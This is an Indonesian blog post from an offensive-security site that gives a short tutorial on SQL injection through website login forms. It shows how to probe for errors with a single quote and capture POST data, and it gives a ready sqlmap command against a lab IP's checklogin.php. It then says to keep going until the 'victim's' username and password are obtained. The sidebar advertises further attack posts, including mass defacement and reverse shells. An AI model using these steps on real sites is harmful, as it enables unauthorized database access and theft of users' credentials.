• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

SQL Injection pada Halaman Login

June 16, 2016 by Jack Wilder 3 Comments

Sebenarnya ini teknik lama namun saya share barangkali ada yang belum tau. SQL Injection sendiri bisa dilakukan di halaman login pada target yang vuln terhadap sqli post data.

Saat kalian megakses halaman login sebuah situs coba masukkan petik satu ( ‘ ) di kolom username atau password nya. Nah jika kalian mendapat error seperti ss diatas maka sqli bisa dilakukan.
Kita gunakan addons HTTP Headers pada firefox untuk meng-capture post data yang terdapat pada halaman login tersebut.
Seperti ss diatas,
Vuln terdapat pada :
http://192.168.48.143/checklogin.php
Dengan post data sebagai berikut :
myusername=linuxsec&mypassword=%27&Submit=Login
Disini saya coba melakukan injeksi dengan SQLmap.
Command nya sebagai berikut :
sqlmap -u "url" --data="post data" --dbs
Contoh :
sqlmap -u http://192.168.48.143/checklogin.php --data="myusername=linuxsec&mypassword=%27&Submit=Login" --dbs
Dan biarkan SQLmap melakukan injeksi otomatis.
Selanjutnya tinggal masukkan command basic SQLmap sampai kita mendapat username dan password victim.
Oke sekian tutor singkat kali ini, semoga bermanfaat.
Shares

Filed Under: SQL Injection Tagged With: Hacking, Linux, Security

Reader Interactions

Comments

  1. Anonim says

    June 16, 2016 at 10:08 am

    nyimak mastah

    Reply
  2. Ginggo binggo says

    September 5, 2016 at 9:12 am

    Kalo mau belajar dari pertama dimana ya postnya min?

    Reply
  3. GalangX says

    April 20, 2020 at 11:30 pm

    Kalo di android pake apa ya buat post data SQL Injection

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tumblr Custom Domain or Subdomain Takeover

MIME Type Sniffing pada Form Upload Gambar

Reverse Shell From Local File Inclusion Exploit

Zendesk Custom Domain or Subdomain Takeover

Mass Deface setelah Rooting Server

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Tool Deface Opencart Bruteforce and Upload Image

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Laravel PHPUnit Remote Code Execution

LinuxSec / 85 queries in 0.21 seconds